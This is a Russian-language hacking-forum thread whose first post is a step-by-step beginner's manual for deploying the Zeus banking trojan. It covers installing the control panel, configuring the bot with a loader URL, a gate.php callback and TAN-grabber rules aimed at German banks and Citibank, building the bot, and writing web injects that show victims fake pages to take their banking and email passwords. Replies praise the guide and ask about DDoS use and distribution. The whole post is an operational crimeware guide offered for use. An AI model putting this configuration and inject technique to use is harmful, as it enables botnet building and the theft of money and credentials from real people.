Подробный мануал по Zeus + Видео (только для новичков)

[_Stealer_]

Подробный мануал по Zeus + Видео (только для новичков)

В конце мануала архив:

TEXT_MANUAL – Подробнейший мануал от автора
Zeus scripts – Скрипты админки (Zeus 1.3.2.1 ) и билдер бота (Zeus 1.2.7.19)
Zeus_video – И само видео.
Полное описание, что это за бот и его возможности вы сможете прочитать скачав архив, в папке TEXT_MANUAL

Приступим к настройке:
Нам понадобиться хостинг с поддержкой Mysql и PHP
Создадим базу данных и перейдем к установке админки
Перенесем содержимое папки ./Zeus scripts/Web на наш хостинг и запустим через браузер инсталлятор
Пример:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
Видим следующее:

Рис 1.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Control Panel 1.3.2.1 Installer

Root user:
User name: (1-20 chars): // Вводим логин пользователя
Password (6-64 chars): // Вводим пароль пользователя
MySQL server:
Host: // Host Mysql – Обычно это localhost
User: // Имя user базы данных
Password: // Пароль user базы данных
Database: // Имя базы данных
Local folders:
Reports: // Название папки с отчетами, по дефолту стоит _reports
Options:
Online bot timeout: // Таймаут бота, по дефолту стоит 25
Encryption key (1-255 chars): // Ключ бота, от 1 до 255 латинских символов
Enable write reports to database. // Сохранять отчеты в базу данных?
Enable write reports to local path. // Сохранять отчеты в локальную папку (по дефолту _reports) ?
После ввода всех данных, жмем Install и дожидаемся установки.
После видим следующее:

Рис 2.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Это значит, что установка завершена

Удаляем с хостинга папку install она нам больше не понадобится
Можем смело направляться в админку [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Рис 3.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Вводим логин и пароль указанные при установке скриптов.
И попадаем в админку:

Рис 4.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Пол дела сделано.
Теперь переходим к настройке бота ./Zeus scripts/Builder 1.2.7.19
Видим 4 файла:
config.txt // Конфигуратор бота
webinjects.txt // Файл со стандартными инжектами
webinjects new.txt // Файл с дополнительными инжектами, если хотим воспользоваться, просто переименуйте в webinjects txt
zsb.exe // Сам билдер Zeus
Запускаем билдер, переходим на вкладку Builder:

Рис 5.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Билдер сам нашел путь к config.txt

Жмем Edit Config:

Код:

;Build time:   09:48:52 12.08.2009 GMT
;Version:      1.2.7.19

entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "http://test1.ru/cfg2.bin"
  url_compip "http://cmyip.com/" 4096
  encryption_key "122122"
  ;blacklist_languages 1049
end 

entry "DynamicConfig"
  url_loader "http://test1.ru/bot.exe"
  url_server "http://test1.ru/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
    ;"http://host/cp/cfg1.bin"
  end
  entry "WebFilters"
    "!*.microsoft.com/*"
    "!http://*myspace.com*"
    "http://www.gruposantander.es/*"
    "!http://*odnoklassniki.ru/*"
    "!http://vkontakte.ru/*"
    "@*/login.osmp.ru/*"
    "@*/atl.osmp.ru/*"
  end
  entry "WebDataFilters"
    ;"http://mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
    ;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
  end
  entry "TANGrabber"
    "http://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*" "*&betrag=*"
    "http://internetbanking.gad.de/banking/*" "S3C6" "*" "*" "KktNrTanEnz"
    "http://www.citibank.de/*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
  end
  entry "DnsMap"
    ;127.0.0.1 microsoft.com
  end
end

Теперь начинаем править под свой хост:
9 строка - url_config "http://test1.ru/cfg2.bin" – путь к будущему cfg.bin файлу
11 строка - encryption_key "122122" - Ключ который вы вводили, когда устанавливали скрипты. Если забыли, то идем в админку
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] -> Options -> Options -> Encryption key:

Рис 6.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

16 строка - url_loader "http://test1.ru/bot.exe" – Путь к будущему боту для загрузки
17 строка - url_server "http://test1.ru/gate.php" – Путь к gate.php для отстука бота
18 строка - file_webinjects "webinjects.txt" – название файла с инжектами
После настройки config.txt сохраняем и жмем Build Config и создавшийся файл нам нужно залить на хостинг согласно настройкам. В нашем случае путь должен быть [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Рис 7.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

После сохранения видим BUILD SUCCEEDED! Значит все гуд.

Идем дальше, жмем Builder loader и сохраняем по настройкам, что бы путь получился [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Рис 8.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Видим Build succeeded!

Теперь можем закрыть билдер и запустить бота
Отстук можем увидеть в админке
Для удаления Zeus с вашего компьютера (Рекомендую не использовать компьютер для бидла и тестинга Zeus, используйте виртуальную машину) запустите еще раз Bulder и нажмите Remove spyware from this system, в поившемся окне жмем ОК, после чего перезагружаем компьютер.

Рис 9.

[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]

Остается криптануть, делать загрузки и наслаждаться личным ботнетом =)

Инжекты для Zeus

- Я новичок в этом деле, расскажи для чего же нужны инжекты?
- Представим, что мы хотим сделать себе троян, который будет воровать пароли от банковского счета! ну или от обычной почты
Под каждый веб ресурс нам нужен свой код инжекта и если правильно составить код ввода данных, то жертва получит фейковую страницу, а мы тем временем пароли =)

Флаги

Определяет основное условие загрузки, может состоять из нескольких флагов в любом порядке, но с учетом регистра. В настоящее время доступны следующие флаги:
P - запускать веб-инжект при POST запросе на URL.
G - запускать веб-инжект при GET запросе на URL.
L - изменяет предназначение веб-инжекта, если указать этот флаг, то будет получен нужный кусок данных и немедленно сохранен в лог.
F - дополняет флаг L, позволяет записывать результат не в лог, а в отдельный файл.
H - дополняет флаг L, сохраняет нужный кусок данных без вырезания тегов.
D - запускать веб-инжект раз в 24 часа.

BlackMask POST

Представляет из себя маску POST-данных передаваемых URL, при которых не будет запускаться веб-инжект.

WhiteMask POST

Представляет из себя маску POST-данных передаваемых URL, при которых будет запускаться веб-инжект.

URL

URL на которую должен срабатывать веб-инжект, можно использовать маску.

URL блокировки

В случаи если ваш веб-инжект должен грузиться лиш один раз на компьютере жертвы, то здесь следует указать маску URL, в случаи открытия которой данный Веб-инжект не будет более использоваться на компьютере.
Если вам этого не нужно, оставьте поле пустым.

Mask context

Маска части содержимого страницы, при котором должен сработать веб-инжект.

После указания URL, со следующей строки начинается перечисление веб-инжектов, которое длится до тех пор, пока не достигнут конец файла или не задана новая URL при помощи очередной записи set_url. Один веб-инжект состоит из трех элементов:

Без флага L:

data_before - маска данных после которых нужно записать новые данные.
data_after - маска данных перед которыми следует записать новые данные.
data_inject - новые данные, на которые будет заменено содержимое между data_before, data_after.

С флагом L:

data_before - маска данных после которых начинается кусок получаемых данных.
data_after - маска данных перед которыми кончается кусок получаемых данных.
data_inject - играет роль заголовка для получаемых данных, нужен лишь для визуального выделения в логах.

Название элемента должно начинаться с первого байта новой строки и сразу после окончания названия должен быть перенос на следующею строку. Со следующей строки идут данные веб-инжекта, окончание данных обозначается строкой data_end, также это строка должна начинаться с первого байта очередной строки. Внутри элемента вы можете свободно использовать любые символы

Примечания:

Как известно, новая строка может обозначаться одним (0x0A) или двумя (0x0D и 0x0A) байтами. Т.к. в основном веб-инжект используется для подмены содержимого текстовых данных, то данная особенность учтена, и бот успешно запускает веб-инжект даже если у вас новые строки обозначены двумя байтами, а в содержимом URL одним байтом и наоборот.
Элементы веб-инжекта могут быть расположены в любом порядке, т.е. data_before, data_after, data_inject, или data_before, data_inject, data_after и т.д.
Элемент может быть пустым.
При использовании флага L, в получаемых данных каждый тег заменяться на один пробел.

Пример файла:
Подмена заголовка любого сайта по протоколу http на фразу "HTTP: Web-Inject"

Код:

;set_url http://* GP 

data_before 
<title> 
data_end 

data_inject 
HTTP: Web-Inject 
data_end 

data_after 
</title> 
data_end

;Подмена заголовка любого сайта по протоколу http на фразу "HTTPS: Web-Inject" и добавление текста "bоdу: Web-Inject" сразу после тега <bоdу>

Код:

set_url http://* GP 

data_before 
<title> 
data_end 

data_inject 
HTTPS: Web-Inject 
data_end 

data_after 
</title> 
data_end 

data_before 
<bоdу> 
data_end 

data_inject 
<hr>bоdу: Web-Inject<hr> 
data_end 

data_after 
data_end

Получаем заголовок страницы

Код:

set_url http://*yahoo.com* LGP 

data_before 
<title> 
data_end 

data_inject 
Yahoo Title: Web-Inject 
data_end 

data_after 
</title> 
data_end

Собранный инжект, Пример под E-gold:

Код:

set_url http://www.e-gold.com/acct/balance.asp* GPL 
data_before 
<form name=fiat*</form> 
data_end 
data_inject 
data_end 
data_after 
<th colspan=4 align=left valign="bottom" 
data_end

© [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
Ссылки на видео:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
пароль на архив:

У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

*****ВНИМАНИЕ!!!*****
После скачивания программы ZeuS настоятельно рекомендуется проверить её антивирусом. Файлы, которые вы загружаете никем не проверены и вы скачиваете их на свой страх и риск. Некоторые программы, которые вы можете найти на сайте, могут определяться антивирусами как hack tools (хакерская программа). Такие программы не наносят вреда вашему компьютеру, однако, стоит учитывать, что в некоторых случаях их использование может попасть под 272-273 статью УК РФ.

[Deymos]

Респект, все очень подробно!

[zerus]

вопще статья супер да + видос просто шик

[zorgus]

ТС, исправь первый пост, эта статья не полная, полная лежит на хакере, добавил материалы по веб инжектам и закон от УК РФ, и периодически добавляю вебинжекты в конце статьи. Следите за обновлениями на хакере. Удачи.

[_Stealer_]

Цитата:

Сообщение от zorgus

ТС, исправь первый пост, эта статья не полная, полная лежит на хакере, добавил материалы по веб инжектам и закон от УК РФ, и периодически добавляю вебинжекты в конце статьи. Следите за обновлениями на хакере. Удачи.

ммм... походу сам автор пожаловал
Ок, подправлю первый пост

[trojan85]

отличная статья! у меня вопрос... можно ли этим ботнетом ддос устроить?

[olegteror]

Нет нельзя,можно использовать для прогруза бинарика какого нить ддос бота.

[jessop]

u menya bot ne zapuskaetsya na win 2008, win7 etc. u vseh tak?

[crack113]

незнаю как у всех . но у мну так

[dokzlo13]

МЕГО РЕСПЕКТИЩЩЕ, статья - супер

[olegteror]

Цитата:

Сообщение от dokzlo13

МЕГО РЕСПЕКТИЩЩЕ, статья - супер

Спасибо кнопка есть хватит Посты набивать.

[enr]

Да стоя отличная по +
С установкой все понятно
Может ли ктото дать рекомендации по zeus
А имено распространению и управлению
команды по админке

[olegteror]

Цитата:

Сообщение от enr

А имено распространению и управлению

Загрузки.
Файл cp.php переминеновывать В обезательном порядке.

[steepx]

Автор респект! отличная статья для новичков. теперь понял почему у меня не запускалось